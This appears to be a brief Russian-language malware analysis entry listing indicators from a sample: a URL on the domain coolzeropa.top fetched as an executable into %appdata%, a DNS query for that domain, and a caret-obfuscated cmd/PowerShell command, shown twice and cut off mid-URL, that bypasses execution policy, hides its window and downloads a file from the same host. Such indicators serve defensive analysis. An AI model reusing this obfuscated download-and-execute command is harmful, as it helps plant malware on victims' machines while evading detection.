Техническая информация
- http://coolzeropa.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWER^S^H^ELl.eXE -^exEcUt^iONpoli^c^Y b^YPasS ^-^Nopr^ofIL^E^ ^-wIn^DoWstY^Le^ Hidden (NEW-^ob^jE^CT S^Y^s^TE^M.^NEt.WEB^cL^ieNT).^dOW^nL^O^AdF^I^le^(^'http://coolz...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /c "POWER^S^H^ELl.eXE -^exEcUt^iONpoli^c^Y b^YPasS ^-^Nopr^ofIL^E^ ^-wIn^DoWstY^Le^ Hidden (NEW-^ob^jE^CT S^Y^s^TE^M.^NEt.WEB^cL^ieNT).^dOW^nL^O^AdF^I^le^(^'http://coolz...' (со скрытым окном)